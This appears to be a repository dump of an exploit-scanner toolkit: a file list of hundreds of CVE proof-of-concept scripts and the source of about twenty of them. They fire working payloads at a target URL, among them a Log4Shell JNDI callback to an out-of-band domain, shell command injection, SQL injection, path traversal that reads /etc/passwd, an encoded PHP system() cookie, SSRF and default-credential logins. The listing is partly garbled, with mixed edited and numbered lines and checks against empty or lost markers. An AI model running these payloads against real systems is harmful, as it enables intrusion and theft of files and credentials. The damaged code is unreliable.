├── poc-yaml-tlr-2005ksh-cve-2021-45428.py
├── poc-yaml-tlr-2855ks6-arbitrary-file-creation-cve-2021-46418.py
├── poc-yaml-tomcat-cve-2017-12615-rce.py
├── poc-yaml-tomcat-cve-2018-11759.py
├── poc-yaml-tongda-meeting-unauthorized-access.py
├── poc-yaml-tongda-oa-action-upload-php-upload.py
├── poc-yaml-tongda-oa-file-read.py
├── poc-yaml-tongda-oa-login-code-php-login-bypass.py
├── poc-yaml-tongda-oa-report-bi-func-php-sqli.py
├── poc-yaml-tongda-user-session-disclosure.py
├── poc-yaml-tongda-v119-sqli.py
├── poc-yaml-topapp-lb-any-user-login.py
├── poc-yaml-topsec-defalut-password.py
├── poc-yaml-topsec-rce.py
├── poc-yaml-totolink-cve-2022-25076-rce.py
├── poc-yaml-tpshop-directory-traversal.py
├── poc-yaml-tpshop-sqli.py
├── poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085.py
├── poc-yaml-twonkyserver-cve-2018-7171-fileread.py
├── poc-yaml-typecho-rce.py
├── poc-yaml-u5cms-cve-2022-32444-url-redirection.py
├── poc-yaml-ueditor-cnvd-2017-20077-file-upload.py
├── poc-yaml-uniview-isc-rce.py
├── poc-yaml-unraid-cve-2020-5847-remote-code-execution.py
├── poc-yaml-uwsgi-cve-2018-7490.py
├── poc-yaml-vbulletin-cve-2019-16759-bypass.py
├── poc-yaml-vbulletin-cve-2019-16759.py
├── poc-yaml-vbulletin-cve-2020-12720.py
├── poc-yaml-vicidial-info-leak.py
├── poc-yaml-visual-tools-dvr-vx16-cve-2021-42071.py
├── poc-yaml-vite-cnvd-2022-44615.py
├── poc-yaml-vmware-vcenter-arbitrary-file-read.py
├── poc-yaml-vmware-vcenter-cve-2021-21985-rce.py
├── poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972.py
├── poc-yaml-vmware-vrealize-cve-2021-21975-ssrf.py
├── poc-yaml-vmware-workspace-cve-2021-22054-ssrf.py
├── poc-yaml-vmware-workspace-cve-2022-22954-rce.py
├── poc-yaml-voipmonitor-cve-2022-24260.py
├── poc-yaml-vtigercrm-cve-2020-19363.py
├── poc-yaml-wanhu-oa-officeserver-file-upload.py
├── poc-yaml-wanhuoa-upload-rce.py
├── poc-yaml-wavlink-cve-2022-2486-rce.py
├── poc-yaml-wavlink-cve-2022-2488-rce.py
├── poc-yaml-wavlink-cve-2022-31845.py
├── poc-yaml-wavlink-cve-2022-31846.py
├── poc-yaml-wavlink-cve-2022-34046.py
├── poc-yaml-wavlink-cve-2022-34049.py
├── poc-yaml-wavlink-cve-2022-34570-info-leak.py
├── poc-yaml-wavlink-nightled-remote-command-execute.py
├── poc-yaml-wavlink-password-disclosure-cve-2022-34047.py
├── poc-yaml-weaver-e-office-lazyuploadify-upload.py
├── poc-yaml-weaver-ebridge-file-read.py
├── poc-yaml-weaver-ecology-getsqldata-sqli-rce.py
├── poc-yaml-weaver-eoffice-userselect-unauth.py
├── poc-yaml-weaver-oa-cnvd-2022-43245.py
├── poc-yaml-weaver-oa-eoffice-information-disclosure.py
├── poc-yaml-weaver-oa-ultra-vires.py
├── poc-yaml-webgrind-index-cve-2018-12909-fileread.py
├── poc-yaml-weblogic-cve-2017-10271-unserialize.py
├── poc-yaml-weblogic-cve-2017-10271.py
├── poc-yaml-weblogic-cve-2019-2725.py
├── poc-yaml-weblogic-cve-2019-2729-1.py
├── poc-yaml-weblogic-cve-2019-2729-2.py
├── poc-yaml-weblogic-cve-2020-14750.py
├── poc-yaml-weblogic-ssrf.py
├── poc-yaml-webmin-cve-2019-15107-rce.py
├── poc-yaml-weijiaoyi-post-curl-ssrf.py
├── poc-yaml-weiphp-path-traversal.py
├── poc-yaml-weiphp-sql.py
├── poc-yaml-western-digital-mycloud-ftp-download-exec.py
├── poc-yaml-western-digital-mycloud-jqueryfiletree-exec.py
├── poc-yaml-western-digital-mycloud-multi-uploadify-file-upload.py
├── poc-yaml-western-digital-mycloud-raid-cgi-exec.py
├── poc-yaml-western-digital-mycloud-sendlogtosupport-php-exec.py
├── poc-yaml-western-digital-mycloud-upload-php-exec.py
├── poc-yaml-western-digital-mycloud-upload-php-upload.py
├── poc-yaml-wi-fi-web-rce.py
├── poc-yaml-wifisky-default-password-cnvd-2021-39012.py
├── poc-yaml-wisegiga-nas-group-php-rce.py
├── poc-yaml-wordpress-all-in-one-video-gallery-cve-2022-2633.py
├── poc-yaml-wordpress-contact-form-7-cve-2020-35489-file-upload.py
├── poc-yaml-wordpress-cve-2019-19985-infoleak.py
├── poc-yaml-wordpress-ext-adaptive-images-lfi.py
├── poc-yaml-wordpress-ext-mailpress-rce.py
├── poc-yaml-wordpress-page-builder-kingcomposer-cve-2022-0165-url-redirect.py
├── poc-yaml-wordpress-photo-gallery-cve-2022-1281.py
├── poc-yaml-wordpress-seo-cve-2021-25118-info-leak.py
├── poc-yaml-wordpress-site-editor-cve-2018-7422-lfi.py
├── poc-yaml-wordpress-theplus-elementor-addon-cve-2021-24358-url-redirection.py
├── poc-yaml-wordpress-welcart-ecommerce-cve-2022-41840-path-traversal.py
├── poc-yaml-wordpress-woocommerce-cve-2021-32789-sqli.py
├── poc-yaml-wordpress-wp-google-maps-cve-2019-10692-sqli.py
├── poc-yaml-wordpress-wp-statistics-cve-2021-24340-sqli.py
├── poc-yaml-wso2-cve-2022-29464-fileupload.py
├── poc-yaml-wuzhicms-cve-2018-11528.py
├── poc-yaml-wuzhicms-v410-sqli.py
├── poc-yaml-xdcms-sql.py
├── poc-yaml-xiaomi-cve-2019-18371.py
├── poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation.py
├── poc-yaml-xunchi-cnvd-2020-23735-file-read.py
├── poc-yaml-yachtcontrol-webapplication-cve-2019-17270.py
├── poc-yaml-yapi-rce.py
├── poc-yaml-yccms-rce.py
├── poc-yaml-yihua-fileupload-cnvd-2022-50678.py
├── poc-yaml-yinda-get-file-read.py
├── poc-yaml-yongyou-nc-cloud-fs-sqli.py
├── poc-yaml-yongyou-u8-oa-sqli.py
├── poc-yaml-yonyou-ERP-NC-readfile.py
├── poc-yaml-yonyou-erp-u8-file-upload.py
├── poc-yaml-yonyou-grp-u8-file-upload.py
├── poc-yaml-yonyou-grp-u8-sqli-to-rce.py
├── poc-yaml-yonyou-grp-u8-sqli.py
├── poc-yaml-yonyou-ksoa-file-upload.py
├── poc-yaml-yonyou-nc-accept-file-upload.py
├── poc-yaml-yonyou-nc-arbitrary-file-upload.py
├── poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce.py
├── poc-yaml-yonyou-nc-file-upload.py
├── poc-yaml-yonyou-nc-service-info-leak.py
├── poc-yaml-yonyou-nc-uapws-db-info-leak.py
├── poc-yaml-yonyou-nc-xxe.py
├── poc-yaml-youphptube-cve-2019-18662.py
├── poc-yaml-youphptube-encoder-cve-2019-5127.py
├── poc-yaml-youphptube-encoder-cve-2019-5128.py
├── poc-yaml-youphptube-encoder-cve-2019-5129.py
├── poc-yaml-yungoucms-sqli.py
├── poc-yaml-zabbix-alllogin-cve-2022-23131.py
├── poc-yaml-zabbix-authentication-bypass.py
├── poc-yaml-zabbix-cve-2016-10134-sqli.py
├── poc-yaml-zabbix-cve-2019-17382.py
├── poc-yaml-zabbix-cve-2022-23134.py
├── poc-yaml-zabbix-default-password.py
├── poc-yaml-zcms-v3-sqli.py
├── poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal.py
├── poc-yaml-zentao-sqli-cnvd-2022-42853.py
├── poc-yaml-zeroshell-cve-2019-12725-rce.py
├── poc-yaml-zhixiang-oa-sqli.py
├── poc-yaml-zhiyuan-oa-fanruan-info-leak.py
├── poc-yaml-zhiyuan-oa-wpsassistservlet-file-upload.py
├── poc-yaml-zhongyuan-iaudit-getluserbysshport-php-code-exec.py
├── poc-yaml-ziguang-sqli-cnvd-2021-41638.py
├── poc-yaml-zimbra-collaboration-server-cve-2013-7091-lfi.py
├── poc-yaml-zimbra-cve-2019-9670-xxe.py
├── poc-yaml-zimbra-cve-2022-27925.py
├── poc-yaml-zoho-cve-2022-23779-info-leak.py
├── poc-yaml-zoho-manageengine-access-manager-plus-cve-2022-29081.py
├── poc-yaml-zoho-manageengine-desktop-central-cve-2021-44515.py
├── poc-yaml-zoho-manageengine-opmanager-cve-2020-12116.py
├── poc-yaml-zoneminder-cve-2016-10140-unauth-access.py
├── poc-yaml-zyxel-cve-2022-0342-auth-bypass.py
├── poc-yaml-zyxel-vmg1312-b10d-cve-2018-19326-path-traversal.py
├── poc-yaml-zyxel-ztp-rce-cve-2022-30525.py
├── poc-yaml-zzcms-zsmanage-sqli.py
├── shenyu-weak-jwt-cve-2021-37580.py
├── ssh-weak-password.py
├── tomcat-weak-password.py
├── tongda2022-login-bypass.py
├── unomi-rce-cve-2020-13942.py
├── v2board-cross-premission.py
├── was-console-unath.py
├── weaver-ecology-database-leak.py
├── weaver-eoffice-do-excel-file-write.py
├── weaver-eoffice-sqli-cnvd-2022-43246.py
├── xxljob-weak-password.py
├── yisaitong-rce-cnvd-2021-26058.py
├── zentao-2023-bypass-rce.py
├── zookeeper_Unauth.py
└── zzzcms-175-rce.py
├── requirements.txt
└── reverse
├── getdomain.py
└── getresult.py
/pocs/Apache-OFBiz-Log4shell-CVE-2021-44228.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | import sys,os
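# Make the "reverse" helper directory importable for the two imports below.
# os.path.join replaces the hard-coded Windows separator: on POSIX hosts
# cwd + '\\reverse' names a directory that does not exist, so the imports fail.
# NOTE(review): the search path is derived from the current working directory,
# so whichever directory the tool is started from decides which
# getdomain/getresult modules are loaded -- start it from the project root only.
cwd = os.getcwd()
sys.path.append(os.path.join(cwd, 'reverse'))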
5 | from getdomain import get_domain
6 | from getresult import get_result
7 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Out-of-band check for CVE-2021-44228 on an OFBiz webtools endpoint.

    get_domain() supplies a (domain, token) pair; a request carrying a JNDI
    lookup for that domain in the OFBiz.Visitor cookie is sent to
    webtools/control/main, and the truthiness of get_result(domain, token)
    is returned as a bool (presumably "was a callback recorded").
    Exceptions raised by requests propagate to the caller.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    callback = get_domain()
    domain, token = callback[0], callback[1]
    target = baseurl + "webtools/control/main"
    cookie = {"Cookie": "OFBiz.Visitor=${jndi:ldap://" + domain + "/tea}"}
    # The HTTP reply is not inspected; only the callback lookup decides the result.
    # NOTE(review): the result is queried immediately after the request, with
    # no wait for a delayed callback -- a slow target may be reported as False.
    requests.get(target, headers=cookie, timeout=5, verify=False)
    return bool(get_result(domain, token))
27 |
--------------------------------------------------------------------------------
/pocs/MagicFlow--mainxp-readfile.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """File-read check against the msa/main.xp download handler.

    Requests main.xp with a downLoadFile value pointing at ../etc/passwd and
    returns True when the reply is HTTP 200 and contains a passwd-style root
    entry, i.e. the handler served a file from outside its own directory.
    Exceptions raised by requests are not handled here.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../etc/passwd"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    return reply.status_code == 200 and re.search("root:[x*]:0:0:", reply.text) is not None
20 |
--------------------------------------------------------------------------------
/pocs/d-link-ShareCenter-DNS-320-system_mgr-rce.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def randomLowercase(n):
    """Return a string of *n* randomly chosen lowercase ASCII letters."""
    import random
    letters = "qwertyuiopasdfghjklzxcvbnm"
    return "".join(letters[random.randint(0, len(letters) - 1)] for _ in range(n))


# Drawn once when the module is imported; scan() in this file does not use it.
r1 = randomLowercase(8)
def scan(baseurl):
    """Command-injection check against cgi-bin/system_mgr.cgi.

    Calls cgi_get_log_item with ';ls;' in the 'total' parameter and returns
    True when the reply body contains 'system_mgr.cgi'.  The status code is
    not checked.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "cgi-bin/system_mgr.cgi?cmd=cgi_get_log_item&total=;ls;"
    reply = requests.get(target, verify=False, timeout=5)
    # NOTE(review): the marker is also part of the request path, so a page
    # that echoes the requested URL (e.g. an error page) would match as well;
    # confirm hits manually before reporting them.
    return 'system_mgr.cgi' in reply.text
23 |
--------------------------------------------------------------------------------
/pocs/dictory-read.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 |
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Detect an auto-generated directory index at the base URL.

    Fetches the normalised base URL and returns True when the body contains
    'Directory listing for /' or 'Index of /'.  The status code is not
    checked.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + ""
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    return 'Directory listing for /' in reply.text or 'Index of /' in reply.text
21 |
--------------------------------------------------------------------------------
/pocs/memcache_Unauth.py:
--------------------------------------------------------------------------------
1 | #-*-coding:utf-8-*-
2 | import socket
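def getdomain(url):
    """Strip the http(s) scheme and any path from *url*, leaving 'host[:port]'."""
    url = url.replace('http://', '').replace('https://', '')
    return (url + '/').split('/')[0]


def scan(baseurl):
    """Report whether the service at *baseurl* answers 'stats' without credentials.

    *baseurl* must carry an explicit port ('host:port', optionally with an
    http(s) scheme and path).  A target without a host, without a port, or
    with a non-numeric or out-of-range port is reported as False instead of
    raising.  Returns True when the first 1024 bytes of the reply to
    'stats' contain 'version', False on any connection or decoding error.
    """
    parts = getdomain(baseurl).split(':')
    if len(parts) < 2 or not parts[0]:
        return False
    try:
        port = int(parts[1])
    except ValueError:
        return False
    if not 0 < port < 65536:
        return False
    try:
        # The context manager closes the socket on every path; the original
        # close() sat after both return statements and was never reached.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
            # Per-socket timeout: socket.setdefaulttimeout() would change the
            # default for every other socket created in this process.
            conn.settimeout(5)
            conn.connect((parts[0], port))
            conn.sendall(b'stats\r\n')
            return 'version' in conn.recv(1024).decode()
    except (OSError, ValueError):
        # OSError covers refused/timed-out connections; ValueError covers
        # undecodable replies and host names that cannot be encoded.
        return False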
25 |
--------------------------------------------------------------------------------
/pocs/poc-api-v2-unath.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(url):
    """Check whether v2/api-docs is served without authentication.

    Returns True when the body of the reply contains 'swagger'.  The status
    code is not checked.  Exceptions raised by requests propagate.
    """
    suffix = 'v2/api-docs' if url[-1] == '/' else '/v2/api-docs'
    reply = requests.get(url + suffix, timeout=5, verify=False)
    return 'swagger' in reply.text
18 |
--------------------------------------------------------------------------------
/pocs/poc-javamelody-monitoring-unath.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(url):
    """Check whether the /monitoring page is reachable without authentication.

    Returns True when the body contains 'JavaMelody' and the status is 200.
    Exceptions raised by requests propagate.
    """
    suffix = 'monitoring' if url[-1] == '/' else '/monitoring'
    reply = requests.get(url + suffix, timeout=5, verify=False)
    return 'JavaMelody' in reply.text and reply.status_code == 200
18 |
--------------------------------------------------------------------------------
/pocs/poc-javamelody-monitoring-xss.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(url):
    """Request the usedMemory graph page of /monitoring and inspect the reply.

    Returns True when the UTF-8 decoded body contains the expected title
    fragment and the status is 200.  Exceptions raised by requests propagate.
    """
    suffix = 'monitoring?part=graph&graph=usedMemory'
    if url[-1] != '/':
        suffix = '/' + suffix
    reply = requests.get(url + suffix, timeout=5, verify=False)
    reply.encoding = 'utf-8'
    # NOTE(review): the first operand is an empty string, which every body
    # contains, so it filters nothing; the marker it once held appears to be
    # missing from this listing.  As written, True only shows that the graph
    # page rendered -- it does not demonstrate script injection; confirm
    # findings manually.
    return '' in reply.text and '监控系统在 _' in reply.text and reply.status_code == 200
19 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-cve-2020-22211-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def randomInt(s, e):
    """Return a random integer N with int(s) <= N <= int(e)."""
    import random
    low, high = int(s), int(e)
    return random.randint(low, high)


# Canary value, drawn once at import time and reused by every scan() call.
rand = randomInt(100000, 200000)
def scan(baseurl):
    """SQL-injection check against plus/ajax_street.php (CVE-2020-22211 per the file name).

    The request asks the database to compute md5() of the module-level
    canary `rand`; True is returned when the reply is HTTP 200 and contains
    that digest, which is computed locally for comparison.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(" + str(rand) + "),9%23"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    expected = md5(str(rand).encode()).hexdigest()
    return reply.status_code == 200 and expected in reply.text
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-sqli-2.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 |
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def randomInt(s, e):
    """Return a random integer N with int(s) <= N <= int(e)."""
    import random
    lower = int(s)
    upper = int(e)
    return random.randint(lower, upper)


# Canary value, drawn once at import time and reused by every scan() call.
rand = randomInt(200000000, 210000000)
def scan(baseurl):
    """SQL-injection check against plus/ajax_officebuilding.php.

    The request asks the database to compute md5() of the module-level
    canary `rand`; True is returned when the locally computed digest shows
    up in the reply body.  The status code is not checked.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(" + str(rand) + "),5,6,7,8,9%23"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    return md5(str(rand).encode()).hexdigest() in reply.text
26 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-74cms-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Error-based SQL-injection check against the AjaxPersonal company_focus action.

    Returns True when the reply body contains the fixed hex marker below.
    The status code is not checked.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + 'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a'
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    # The marker is 31 hex characters, one short of a full MD5 digest --
    # presumably because the database truncates the error text; verify.
    # NOTE(review): the canary is a constant, so any page that happens to
    # contain this string is reported as a hit.
    return "ef775988943825d2871e1cfa75473ec" in reply.text
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Ametys-CMS-CVE-2022-26159.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Query the search auto-completion service (CVE-2022-26159 per the file name).

    Requests .../auto-completion/domain/en.xml?q=adm and returns True when
    the reply is HTTP 200 and matches the XML-declaration pattern.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "plugins/web/service/search/auto-completion/domain/en.xml?q=adm"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    # NOTE(review): the last operand is an empty string and is therefore
    # always contained in the body; the marker it once held appears to be
    # missing from this listing.  As written, any XML reply from this path
    # counts as a hit, so results need manual confirmation.
    return (
        reply.status_code == 200
        and re.search('xml version="1.0"', reply.text) is not None
        and '' in reply.text
    )
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-EWEBS-fileread.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """File-read check against casmain.xgi.

    Posts a Language_S value that points at windows/win.ini through parent
    directory references and returns True when the reply is HTTP 200 and
    contains 'for 16-bit app support'.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "casmain.xgi"
    form = "Language_S=../../../../windows/win.ini"
    hdrs = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    reply = requests.post(target, form, headers=hdrs, timeout=5, verify=False)
    return reply.status_code == 200 and "for 16-bit app support" in reply.text
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Emlog-CVE-2021-3293.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check t/index.php for a leaked PHP warning (CVE-2021-3293 per the file name).

    Passes 'action' as an array and returns True when the reply is HTTP 200
    and contains both 'Warning' and 'expects parameter'.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "t/index.php?action[]=test"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and "Warning" in page and "expects parameter" in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Full-read-SSRF-in-Spring-Cloud-Netflix.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """SSRF check against the proxy.stream endpoint.

    Asks the endpoint to fetch http://www.baidu.com/ and returns True when
    the reply is HTTP 200 and contains both 'baidu.com' and 'bdstatic.com',
    i.e. the target relayed the remote page.  Note that each probe makes the
    target contact that third-party site.  Exceptions raised by requests
    propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "proxy.stream?origin=http://www.baidu.com/?"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and "baidu.com" in page and "bdstatic.com" in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-Ivanti-Endpoint-Manager-CVE-2021-44529-RCE.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check client/index.php for CVE-2021-44529 (identifier from the file name).

    Sends the cookie set below and returns True when the reply is HTTP 200
    and contains a passwd-style root entry.  Exceptions raised by requests
    propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "client/index.php"
    cookies = {'Cookie': 'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID='}
    reply = requests.get(target, headers=cookies, timeout=5, verify=False)
    return reply.status_code == 200 and re.search("root:[x*]:0:0:", reply.text) is not None
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-airflow-unauth.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
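def scan(baseurl):
    """Check whether the admin/ page is served without authentication.

    Returns True when the reply is HTTP 200 and contains both body markers
    below.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "admin/"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    # NOTE(review): in the listing the second marker is a plain string literal
    # broken across two lines, which is a syntax error.  The line break is
    # kept here as an explicit "\n"; the original marker was probably longer
    # (surrounding markup looks lost) -- confirm against the upstream rule.
    return (
        reply.status_code == 200
        and "Airflow - DAGs" in reply.text
        and "DAGs\n" in reply.text
    )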
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-alibaba-anyproxy-fetchbody-fileread.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """File-read check against the fetchBody endpoint.

    Passes an id that walks up to /etc/passwd and returns True when the
    reply is HTTP 200 and contains a passwd-style root entry.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "fetchBody?id=1/../../../../../../../../etc/passwd"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    if reply.status_code != 200:
        return False
    return re.search("root:[x*]:0:0:", reply.text) is not None
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-alibaba-canal-info-leak.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether api/v1/canal/config/1/1 discloses cloud access keys.

    Returns True when the reply is HTTP 200 and names both the accessKey and
    the secretKey setting; a hit means those keys should be treated as
    exposed.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "api/v1/canal/config/1/1"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return (
        reply.status_code == 200
        and "ncanal.aliyun.accessKey" in page
        and "ncanal.aliyun.secretKey" in page
    )
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-airflow-cve-2020-13927-unauthorized.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Check whether api/experimental/latest_runs answers without authentication.

    Returns True when the reply is HTTP 200 and contains both the
    "dag_run_url": and "dag_id": keys (CVE-2020-13927 per the file name).
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "api/experimental/latest_runs"
    ua = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
    reply = requests.get(target, headers=ua, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and '"dag_run_url":' in page and '"dag_id":' in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-ambari-default-password.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Default-credential check against the users/admin API.

    Sends the fixed Basic Authorization header below and returns True when
    the reply is HTTP 200 and contains 'PrivilegeInfo' and
    'AMBARI.ADMINISTRATOR'; a hit means the account password should be
    changed.  Exceptions raised by requests propagate.
    """
    if baseurl[-1] != '/':
        baseurl += "/"
    target = baseurl + "api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name"
    auth = {'Authorization': 'Basic YWRtaW46YWRtaW4='}
    reply = requests.get(target, headers=auth, timeout=5, verify=False)
    page = reply.text
    return reply.status_code == 200 and "PrivilegeInfo" in page and "AMBARI.ADMINISTRATOR" in page
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-apache-guacamole-default-password.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def scan(baseurl):
    """Default-credential check against api/tokens.

    Posts the fixed username/password form below and returns True when the
    reply is HTTP 200 and contains the guacadmin userID together with an
    authToken key; a hit means the account password should be changed.
    Exceptions raised by requests propagate.
    """
    if baseurl[-1] != "/":
        baseurl += "/"
    target = baseurl + "api/tokens"
